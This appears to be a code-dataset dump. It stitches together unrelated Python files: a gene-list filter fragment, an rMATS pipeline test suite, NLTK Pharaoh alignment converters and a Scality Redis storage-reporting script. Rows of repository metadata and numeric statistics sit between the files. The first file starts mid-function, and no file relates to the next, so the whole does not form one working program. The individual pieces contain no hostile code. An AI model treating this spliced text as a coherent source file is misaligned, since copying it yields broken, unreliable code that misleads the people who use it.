"""hl_reportable"""
return (len(set(rec.Genes) &
{
'ABHD12',
'ACTG1',
'ADGRV1',
'AIFM1',
'ATP6V1B1',
'BCS1L',
'BSND',
'CABP2',
'CACNA1D',
'CDC14A',
'CDH23',
'CEACAM16',
'CEP78',
'CHD7',
'CIB2',
'CISD2',
'CLDN14',
'CLIC5',
'CLPP',
'CLRN1',
'COCH',
'COL11A2',
'DIAPH1',
'DIAPH3',
'DMXL2',
'DNMT1',
'DSPP',
'EDN3',
'EDNRB',
'EPS8',
'EPS8L2',
'ESPN',
'ESRRB',
'EYA1',
'EYA4',
'GIPC3',
'GJB2',
'GJB6',
'GPSM2',
'GRHL2',
'GRXCR1',
'GSDME',
'HGF',
'HSD17B4',
'ILDR1',
'KCNE1',
'KCNQ1',
'KCNQ4',
'LARS2',
'LHFPL5',
'LOXHD1',
'LRTOMT',
'MARVELD2',
'MIR96',
'MITF',
'MSRB3',
'MT-RNR1',
'MT-TS1',
'MYH14',
'MYH9',
'MYO15A',
'MYO3A',
'MYO6',
'MYO7A',
'OSBPL2',
'OTOA',
'OTOF',
'OTOG',
'OTOGL',
'P2RX2',
'PAX3',
'PDZD7',
'PJVK',
'POU3F4',
'POU4F3',
'PRPS1',
'PTPRQ',
'RDX',
'RIPOR2',
'S1PR2',
'SERPINB6',
'SIX1',
'SLC17A8',
'SLC26A4',
'SLC52A2',
'SLITRK6',
'SMPX',
'SOX10',
'STRC',
'SYNE4',
'TBC1D24',
'TECTA',
'TIMM8A',
'TMC1',
'TMIE',
'TMPRSS3',
'TPRN',
'TRIOBP',
'TUBB4B',
'USH1C',
'USH1G',
'USH2A',
'WFS1',
'WHRN',
}
) > 0)
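# Minimal usage sketch, assuming only that rec exposes a .Genes iterable of
# gene symbols; the stub record and the second gene name are hypothetical.
if __name__ == '__main__':
    class _StubRec:
        Genes = ['GJB2', 'NOT_A_GENE']
    assert evalRec(None, _StubRec()) is True
    _StubRec.Genes = ['NOT_A_GENE']
    assert evalRec(None, _StubRec()) is False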
| 21.027273 | 32 | 0.253783 | 118 | 2,313 | 4.966102 | 0.983051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118221 | 0.601383 | 2,313 | 110 | 33 | 21.027273 | 0.517354 | 0.00562 | 0 | 0 | 0 | 0 | 0.234858 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0 | 0 | 0.018349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cc20f1f6a53dbfc79dbca785199d6d05868daf1
| 25,440 |
py
|
Python
|
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
import glob
import os.path
import subprocess
import sys
import unittest
import tests.bam
import tests.base_test
import tests.gtf
import tests.output_parser as output_parser
import tests.test_config
import tests.util
class Test(tests.base_test.BaseTest):
def setUp(self):
super().setUp()
self._test_base_dir = tests.test_config.TEST_BASE_DIR
self._test_dir = os.path.join(self._test_base_dir, 'prep_post')
self._generated_input_dir = os.path.join(self._test_dir,
'generated_input')
self._out_dir = os.path.join(self._test_dir, 'out')
self._prep_1_tmp_dir = os.path.join(self._test_dir, 'tmp_prep_1')
self._prep_2_tmp_dir = os.path.join(self._test_dir, 'tmp_prep_2')
self._post_tmp_dir = os.path.join(self._test_dir, 'tmp_post')
self._dup_input_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_dup_input_bam')
self._dup_prep_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_dup_prep_bam')
self._miss_input_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_miss_input_bam')
self._miss_prep_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_miss_prep_bam')
tests.util.recreate_dirs([
self._generated_input_dir, self._out_dir, self._prep_1_tmp_dir,
self._prep_2_tmp_dir, self._post_tmp_dir,
self._dup_input_bam_tmp_dir, self._dup_prep_bam_tmp_dir,
self._miss_input_bam_tmp_dir, self._miss_prep_bam_tmp_dir,
self._command_output_dir()
])
self._read_type = 'paired'
self._read_length = 50
self._sample_1_bams_path = os.path.join(self._generated_input_dir,
'b1.txt')
self._sample_2_bams_path = os.path.join(self._generated_input_dir,
'b2.txt')
sample_1_bam_replicate_template = os.path.join(
self._generated_input_dir, 'sample_1_rep_{}.bam')
sample_2_bam_replicate_template = os.path.join(
self._generated_input_dir, 'sample_2_rep_{}.bam')
self._sample_1_bams = self._create_sample_1_bams(
self._sample_1_bams_path, sample_1_bam_replicate_template)
self._sample_2_bams = self._create_sample_2_bams(
self._sample_2_bams_path, sample_2_bam_replicate_template)
self._gtf_path = os.path.join(self._generated_input_dir, 'test.gtf')
self._gtf = self._create_gtf(self._gtf_path)
self._sub_steps = [
'prep_1',
'inte_1_fail',
'inte_1_pass',
'prep_2',
'inte_2_fail',
'inte_2_pass',
'post',
'duplicate_input_bam',
'duplicate_prep_bam',
'missing_input_bam',
'missing_prep_bam',
]
self._sub_step = None
def test(self):
for sub_step in self._sub_steps:
self._sub_step = sub_step
self._setup_sub_step()
self._run_test()
def _command_output_dir(self):
return os.path.join(self._test_dir, 'command_output')
def _rmats_arguments(self):
arguments = [
'--gtf',
self._gtf_path,
'--od',
self._out_dir,
'-t',
self._read_type,
'--readLength',
str(self._read_length),
]
if self._sub_step == 'prep_1':
arguments.extend([
'--tmp',
self._prep_1_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--task',
'prep',
])
elif self._sub_step == 'inte_1_fail':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'inte',
])
elif self._sub_step == 'inte_1_pass':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--task',
'inte',
'--statoff',
])
elif self._sub_step == 'prep_2':
arguments.extend([
'--tmp',
self._prep_2_tmp_dir,
'--b1',
self._sample_2_bams_path,
'--task',
'prep',
])
elif self._sub_step == 'inte_2_fail':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_2_bams_path,
'--task',
'inte',
'--statoff',
])
elif self._sub_step == 'inte_2_pass':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'inte',
])
elif self._sub_step == 'post':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'post',
])
elif self._sub_step == 'duplicate_input_bam':
arguments.extend([
'--tmp',
self._dup_input_bam_tmp_dir,
'--b1',
self._dup_input_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'duplicate_prep_bam':
arguments.extend([
'--tmp',
self._dup_prep_bam_tmp_dir,
'--b1',
self._dup_prep_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'missing_input_bam':
arguments.extend([
'--tmp',
self._miss_input_bam_tmp_dir,
'--b1',
self._miss_input_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'missing_prep_bam':
arguments.extend([
'--tmp',
self._miss_prep_bam_tmp_dir,
'--b1',
self._miss_prep_bam_path,
'--task',
'post',
'--statoff',
])
return arguments
def _setup_sub_step(self):
if self._sub_step == 'duplicate_input_bam':
self._setup_dup_input_bam()
elif self._sub_step == 'duplicate_prep_bam':
self._setup_dup_prep_bam()
elif self._sub_step == 'missing_input_bam':
self._setup_miss_input_bam()
elif self._sub_step == 'missing_prep_bam':
self._setup_miss_prep_bam()
def _setup_dup_input_bam(self):
self._dup_input_bam_path = os.path.join(self._generated_input_dir,
'dup_input.txt')
bams = self._sample_1_bams + [self._sample_1_bams[0]]
self._write_bams(bams, self._dup_input_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._dup_input_bam_tmp_dir)
def _setup_dup_prep_bam(self):
self._dup_prep_bam_path = os.path.join(self._generated_input_dir,
'dup_prep.txt')
bams = self._sample_1_bams
self._write_bams(bams, self._dup_prep_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._dup_prep_bam_tmp_dir)
self._cp_with_prefix('prep_1_again', self._prep_1_tmp_dir,
self._dup_prep_bam_tmp_dir)
def _setup_miss_input_bam(self):
self._miss_input_bam_path = os.path.join(self._generated_input_dir,
'miss_input.txt')
bams = [self._sample_1_bams[0]]
self._write_bams(bams, self._miss_input_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._miss_input_bam_tmp_dir)
def _setup_miss_prep_bam(self):
self._miss_prep_bam_path = os.path.join(self._generated_input_dir,
'miss_prep.txt')
bams = self._sample_1_bams + self._sample_2_bams
self._write_bams(bams, self._miss_prep_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._miss_prep_bam_tmp_dir)
def _create_gtf(self, gtf_path):
gtf = tests.gtf.GTF()
gtf.path = gtf_path
transcript_1 = tests.gtf.Transcript()
transcript_1.chromosome = '1'
transcript_1.strand = '+'
transcript_1.gene_id = tests.util.gene_id_str(1)
transcript_1.gene_name = tests.util.gene_name_str(1)
transcript_1.transcript_id = tests.util.transcript_id_str(1)
transcript_1.exons = [(1, 100), (201, 300), (401, 500)]
gtf.transcripts = [transcript_1]
error = gtf.write()
self.assertFalse(error)
return gtf
def _create_sample_1_bams(self, sample_1_bams_path,
sample_1_replicate_template):
rep_1_bam = tests.bam.BAM()
rep_1_bam.path = sample_1_replicate_template.format(1)
rep_2_bam = tests.bam.BAM()
rep_2_bam.path = sample_1_replicate_template.format(2)
sample_1_bams = [rep_1_bam, rep_2_bam]
rep_1_read_1 = tests.bam.Read()
rep_1_read_1.ref_seq_name = '1' # chromosome
rep_1_read_1.ref_seq_len = 1000 # chromosome length
rep_1_read_1.template_name = tests.util.template_name_str([1, 1])
rep_1_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_1_read_1,
rep_1_read_2,
[[76, 100], [201, 300]],
[[401, 475]],
self._read_length)
self.assertFalse(error)
rep_1_bam.reads = [rep_1_read_1, rep_1_read_2]
rep_2_read_1 = tests.bam.Read()
rep_2_read_1.ref_seq_name = '1' # chromosome
rep_2_read_1.ref_seq_len = 1000 # chromosome length
rep_2_read_1.template_name = tests.util.template_name_str([1, 2])
rep_2_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(
rep_2_read_1, rep_2_read_2, [[26, 100]], [[201, 300], [401, 425]],
self._read_length)
self.assertFalse(error)
rep_2_bam.reads = [rep_2_read_1, rep_2_read_2]
self._write_bams(sample_1_bams, sample_1_bams_path)
return sample_1_bams
def _create_sample_2_bams(self, sample_2_bams_path,
sample_2_replicate_template):
rep_1_bam = tests.bam.BAM()
rep_1_bam.path = sample_2_replicate_template.format(1)
rep_2_bam = tests.bam.BAM()
rep_2_bam.path = sample_2_replicate_template.format(2)
sample_2_bams = [rep_1_bam, rep_2_bam]
rep_1_read_1 = tests.bam.Read()
rep_1_read_1.ref_seq_name = '1' # chromosome
rep_1_read_1.ref_seq_len = 1000 # chromosome length
rep_1_read_1.template_name = tests.util.template_name_str([2, 1])
rep_1_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_1_read_1,
rep_1_read_2,
[[76, 100], [401, 500]],
[[401, 475]],
self._read_length)
self.assertFalse(error)
rep_1_bam.reads = [rep_1_read_1, rep_1_read_2]
rep_2_read_1 = tests.bam.Read()
rep_2_read_1.ref_seq_name = '1' # chromosome
rep_2_read_1.ref_seq_len = 1000 # chromosome length
rep_2_read_1.template_name = tests.util.template_name_str([2, 2])
rep_2_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_2_read_1,
rep_2_read_2,
[[26, 100]],
[[1, 100], [401, 425]],
self._read_length)
self.assertFalse(error)
rep_2_bam.reads = [rep_2_read_1, rep_2_read_2]
self._write_bams(sample_2_bams, sample_2_bams_path)
return sample_2_bams
def _cp_with_prefix(self, prefix, source_dir, dest_dir):
source_paths = self._get_dot_rmats_paths(source_dir)
command = [
sys.executable, tests.test_config.CP_WITH_PREFIX, prefix, dest_dir
]
command.extend(source_paths)
subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True)
def _check_results(self):
if self._sub_step == 'prep_1':
self._check_results_prep_1()
elif self._sub_step == 'inte_1_fail':
self._check_results_inte_1_fail()
elif self._sub_step == 'inte_1_pass':
self._check_results_inte_1_pass()
elif self._sub_step == 'prep_2':
self._check_results_prep_2()
elif self._sub_step == 'inte_2_fail':
self._check_results_inte_2_fail()
elif self._sub_step == 'inte_2_pass':
self._check_results_inte_2_pass()
elif self._sub_step == 'post':
self._check_results_post()
elif self._sub_step == 'duplicate_input_bam':
self._check_results_dup_input_bam()
elif self._sub_step == 'duplicate_prep_bam':
self._check_results_dup_prep_bam()
elif self._sub_step == 'missing_input_bam':
self._check_results_miss_input_bam()
elif self._sub_step == 'missing_prep_bam':
self._check_results_miss_prep_bam()
else:
self.fail('unexpected sub_step: {}'.format(self._sub_step))
def _get_dot_rmats_paths(self, tmp_dir):
dot_rmats_file_paths = glob.glob(os.path.join(tmp_dir, '*.rmats'))
# filenames begin with a timestamp used for alphanumeric sort
return sorted(dot_rmats_file_paths)
def _check_results_prep_1(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_no_line_has(self, out_lines,
'Processing count files')
test_gene_id = tests.util.gene_id_str(1)
quoted_test_gene_id = tests.util.double_quote(test_gene_id)
dot_rmats_paths = self._get_dot_rmats_paths(self._prep_1_tmp_dir)
self.assertEqual(len(dot_rmats_paths), 2)
for dot_rmats_i in range(2):
dot_rmats_contents, error = output_parser.parse_dot_rmats(
dot_rmats_paths[dot_rmats_i])
self.assertFalse(error)
self.assertEqual(dot_rmats_contents['bams'],
[self._sample_1_bams[dot_rmats_i].path])
self.assertEqual(dot_rmats_contents['read_length'],
self._read_length)
novel_juncs = dot_rmats_contents['novel_juncs']
self.assertEqual(novel_juncs, [dict()])
exons = dot_rmats_contents['exons']
if dot_rmats_i == 0:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [401, 499],
'end_box': [401, 499],
'counts': [1, 0]
}]
}])
else:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [1, 99],
'end_box': [1, 99],
'counts': [1, 0]
}]
}])
multis = dot_rmats_contents['multis']
if dot_rmats_i == 0:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 200], [299, 299]],
'count':
1
}]
}])
else:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[201, 201], [300, 400], [499, 499]],
'count':
1
}]
}])
self._cp_with_prefix('prep_1_', self._prep_1_tmp_dir,
self._post_tmp_dir)
def _check_results_prep_2(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_no_line_has(self, out_lines,
'Processing count files')
test_gene_id = tests.util.gene_id_str(1)
quoted_test_gene_id = tests.util.double_quote(test_gene_id)
dot_rmats_paths = self._get_dot_rmats_paths(self._prep_2_tmp_dir)
self.assertEqual(len(dot_rmats_paths), 2)
for dot_rmats_i in range(2):
dot_rmats_contents, error = output_parser.parse_dot_rmats(
dot_rmats_paths[dot_rmats_i])
self.assertFalse(error)
self.assertEqual(dot_rmats_contents['bams'],
[self._sample_2_bams[dot_rmats_i].path])
self.assertEqual(dot_rmats_contents['read_length'],
self._read_length)
novel_juncs = dot_rmats_contents['novel_juncs']
self.assertEqual(novel_juncs, [{quoted_test_gene_id: [[0, 0, 2]]}])
exons = dot_rmats_contents['exons']
if dot_rmats_i == 0:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [401, 499],
'end_box': [401, 499],
'counts': [1, 0]
}]
}])
else:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [1, 99],
'end_box': [1, 99],
'counts': [1, 0]
}]
}])
multis = dot_rmats_contents['multis']
if dot_rmats_i == 0:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 400], [499, 499]],
'count':
1
}]
}])
else:
self.assertEqual(multis, [{
quoted_test_gene_id: [{
'junction_pairs': [[1, 1], [100, 400], [499, 499]],
'count':
1
}]
}])
self._cp_with_prefix('prep_2_', self._prep_2_tmp_dir,
self._post_tmp_dir)
def _check_results_inte_1_fail(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
tests.util.assert_some_line_has(
self, err_lines, 'input bam files with no associated prep output')
def _check_results_inte_1_pass(self):
self._check_no_error_results()
def _check_results_inte_2_fail(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
tests.util.assert_some_line_has(
self, err_lines,
'bam files not in input but associated with prep output')
def _check_results_inte_2_pass(self):
self._check_no_error_results()
def _check_results_post(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_some_line_has(self, out_lines,
'Processing count files')
from_gtf_se_path = os.path.join(self._out_dir, 'fromGTF.SE.txt')
from_gtf_se_header, from_gtf_se_rows, error = output_parser.parse_from_gtf(
from_gtf_se_path)
self.assertFalse(error)
self.assertEqual(len(from_gtf_se_rows), 1)
from_gtf_se_row = from_gtf_se_rows[0]
self.assertEqual(from_gtf_se_row['GeneID'],
tests.util.double_quote(tests.util.gene_id_str(1)))
self.assertEqual(from_gtf_se_row['exonStart_0base'], '200')
self.assertEqual(from_gtf_se_row['exonEnd'], '300')
jc_raw_se_path = os.path.join(self._out_dir, 'JC.raw.input.SE.txt')
jc_raw_se_header, jc_raw_se_rows, error = output_parser.parse_jc_raw(
jc_raw_se_path)
self.assertFalse(error)
self.assertEqual(len(jc_raw_se_rows), 1)
jc_raw_se_row = jc_raw_se_rows[0]
self.assertEqual(jc_raw_se_row['ID'], from_gtf_se_row['ID'])
self.assertEqual(jc_raw_se_row['IJC_SAMPLE_1'], '1,1')
self.assertEqual(jc_raw_se_row['SJC_SAMPLE_1'], '0,0')
self.assertEqual(jc_raw_se_row['IJC_SAMPLE_2'], '0,0')
self.assertEqual(jc_raw_se_row['SJC_SAMPLE_2'], '1,1')
se_mats_jc_path = os.path.join(self._out_dir, 'SE.MATS.JC.txt')
se_mats_jc_header, se_mats_jc_rows, error = output_parser.parse_mats_jc(
se_mats_jc_path)
self.assertFalse(error)
self._check_se_mats_jc_header(se_mats_jc_header)
self.assertEqual(len(se_mats_jc_rows), 1)
se_mats_jc_row = se_mats_jc_rows[0]
pvalue = float(se_mats_jc_row['PValue'])
tests.util.assert_within_bounds(self, pvalue, 0, 1)
fdr = float(se_mats_jc_row['FDR'])
tests.util.assert_within_bounds(self, fdr, 0, 1)
inc_level_1_splits = se_mats_jc_row['IncLevel1'].split(',')
self.assertEqual(len(inc_level_1_splits), 2)
self.assertAlmostEqual(float(inc_level_1_splits[0]), 1)
self.assertAlmostEqual(float(inc_level_1_splits[1]), 1)
inc_level_2_splits = se_mats_jc_row['IncLevel2'].split(',')
self.assertEqual(len(inc_level_2_splits), 2)
self.assertAlmostEqual(float(inc_level_2_splits[0]), 0)
self.assertAlmostEqual(float(inc_level_2_splits[1]), 0)
self.assertAlmostEqual(float(se_mats_jc_row['IncLevelDifference']), 1)
def _check_results_dup_input_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
dup_bam_path = self._sample_1_bams[0].path
expected_error = '{} given 2 times'.format(dup_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
def _check_results_dup_prep_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
for bam in self._sample_1_bams:
dup_bam_path = bam.path
expected_error = '{} found 2 times in .rmats'.format(dup_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
def _check_results_miss_input_bam(self):
self._check_no_error_results()
def _check_results_miss_prep_bam(self):
self.assertNotEqual(self._rmats_return_code, 0)
command_stderr_file_name = self._get_stderr_file_name()
with open(command_stderr_file_name, 'rt') as err_f_h:
err_lines = err_f_h.readlines()
for bam in self._sample_2_bams:
miss_bam_path = bam.path
expected_error = '{} not found in .rmats'.format(miss_bam_path)
tests.util.assert_some_line_has(self, err_lines, expected_error)
if __name__ == '__main__':
unittest.main(verbosity=2)
| 39.75 | 83 | 0.553263 | 3,131 | 25,440 | 3.984031 | 0.067071 | 0.020683 | 0.025573 | 0.025814 | 0.797819 | 0.735289 | 0.662819 | 0.618086 | 0.568462 | 0.531666 | 0 | 0.031469 | 0.347956 | 25,440 | 639 | 84 | 39.812207 | 0.720521 | 0.006879 | 0 | 0.527531 | 0 | 0 | 0.070521 | 0 | 0 | 0 | 0 | 0 | 0.104796 | 1 | 0.046181 | false | 0.017762 | 0.019538 | 0.001776 | 0.078153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cc57c915f6cace046e0bbe739957206038f009f
| 1,527 |
py
|
Python
|
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | 1 |
2015-11-25T00:47:58.000Z
|
2015-11-25T00:47:58.000Z
|
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | null | null | null |
nltk/align/util.py
|
kruskod/nltk
|
dba7b5431b1d57a75d50e048961c1a203b98c3da
|
[
"Apache-2.0"
] | null | null | null |
# Natural Language Toolkit: Aligner Utilities
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Anna Garbar
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
from nltk.align.api import Alignment
def pharaohtext2tuples(pharaoh_text):
"""
Converts pharaoh text format into an Alignment object (a list of tuples).
>>> pharaoh_text = '0-0 2-1 9-2 21-3 10-4 7-5'
>>> pharaohtext2tuples(pharaoh_text)
Alignment([(0, 0), (2, 1), (7, 5), (9, 2), (10, 4), (21, 3)])
:type pharaoh_text: str
:param pharaoh_text: the word alignment outputs in the pharaoh output format
:rtype: Alignment
:return: An Alignment object that contains a list of integer tuples
"""
# Converts integers to strings for a word alignment point.
    list_of_tuples = [tuple(map(int, a.split('-'))) for a in pharaoh_text.split()]
return Alignment(list_of_tuples)
def alignment2pharaohtext(alignment):
"""
Converts an Alignment object (a list of tuples) into pharaoh text format.
>>> alignment = [(0, 0), (2, 1), (9, 2), (21, 3), (10, 4), (7, 5)]
>>> alignment2pharaohtext(alignment)
'0-0 2-1 9-2 21-3 10-4 7-5'
:type alignment: Alignment
:param alignment: An Alignment object that contains a list of integer tuples
:rtype: str
:return: the word alignment outputs in the pharaoh output format
"""
    pharaoh_text = ' '.join(str(i) + "-" + str(j) for i, j in alignment)
return pharaoh_text
| 33.933333 | 81 | 0.642436 | 218 | 1,527 | 4.444954 | 0.348624 | 0.113519 | 0.070175 | 0.016512 | 0.335397 | 0.321981 | 0.321981 | 0.260062 | 0.260062 | 0.163055 | 0 | 0.058219 | 0.235102 | 1,527 | 44 | 82 | 34.704545 | 0.771404 | 0.693517 | 0 | 0 | 0 | 0 | 0.008357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cda6328ac58b61f05923cca8623aa6b42f94561
| 3,591 |
py
|
Python
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 13 |
2016-10-07T20:25:11.000Z
|
2022-02-23T06:33:59.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 427 |
2016-08-17T18:03:32.000Z
|
2022-03-31T10:46:12.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 5 |
2017-04-25T21:13:03.000Z
|
2018-01-23T00:21:06.000Z
|
import requests
import redis
import json
import re
import argparse
from concurrent.futures import ThreadPoolExecutor
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--sentinel-ip", default='127.0.0.1', help="Sentinel IP")
parser.add_argument("-p", "--sentinel-port", default="16379", help="Sentinel Port")
parser.add_argument("-v", "--redis-password", default=None, help="Redis AUTH Password")
parser.add_argument("-n", "--sentinel-cluster-name", default='scality-s3', help="Redis cluster name")
parser.add_argument("-b", "--bucketd-addr", default='http://127.0.0.1:9000', help="URL of the bucketd server")
return parser.parse_args()
def safe_print(content):
print("{0}".format(content))
class askRedis():
def __init__(self, ip="127.0.0.1", port="16379", sentinel_cluster_name="scality-s3", password=None):
self._password = password
r = redis.Redis(host=ip, port=port, db=0, password=password)
self._ip, self._port = r.sentinel_get_master_addr_by_name(sentinel_cluster_name)
def read(self, resource, name):
r = redis.Redis(host=self._ip, port=self._port, db=0, password=self._password)
res = 's3:%s:%s:storageUtilized:counter' % (resource, name)
total_size = r.get(res)
res = 's3:%s:%s:numberOfObjects:counter' % (resource, name)
files = r.get(res)
try:
return {'files': int(files), "total_size": int(total_size)}
        except Exception:
return {'files': 0, "total_size": 0}
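# NOTE: read() assembles utapi counter keys of the form
#   s3:<resource>:<name>:storageUtilized:counter
#   s3:<resource>:<name>:numberOfObjects:counter
# e.g. resource='buckets', name='mybucket' queries
# 's3:buckets:mybucket:storageUtilized:counter'.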
class S3ListBuckets():
def __init__(self, host='127.0.0.1:9000'):
self.bucketd_host = host
def run(self):
docs = []
url = "%s/default/bucket/users..bucket" % self.bucketd_host
session = requests.Session()
r = session.get(url, timeout=30)
if r.status_code == 200:
payload = json.loads(r.text)
for keys in payload['Contents']:
key = keys["key"]
                r1 = re.match(r"(\w+)..\|..(\w+.*)", key)
                if r1 is not None:
                    docs.append(r1.groups())
return docs
        # Non-200 response: fall through and return the empty result list.
        return docs
if __name__ == '__main__':
options = get_options()
redis_conf = dict(
ip=options.sentinel_ip,
port=options.sentinel_port,
sentinel_cluster_name=options.sentinel_cluster_name,
password=options.redis_password
)
P = S3ListBuckets(options.bucketd_addr)
listbuckets = P.run()
userids = set([x for x, y in listbuckets])
executor = ThreadPoolExecutor(max_workers=1)
for userid, bucket in listbuckets:
U = askRedis(**redis_conf)
data = U.read('buckets', bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
data = U.read('buckets', 'mpuShadowBucket'+bucket)
content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, 'mpuShadowBucket'+bucket, data["files"], data["total_size"])
executor.submit(safe_print, content)
executor.submit(safe_print, "")
for userid in sorted(userids):
U = askRedis(**redis_conf)
data = U.read('accounts', userid)
content = "Account:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
userid, data["files"], data["total_size"])
executor.submit(safe_print, content)
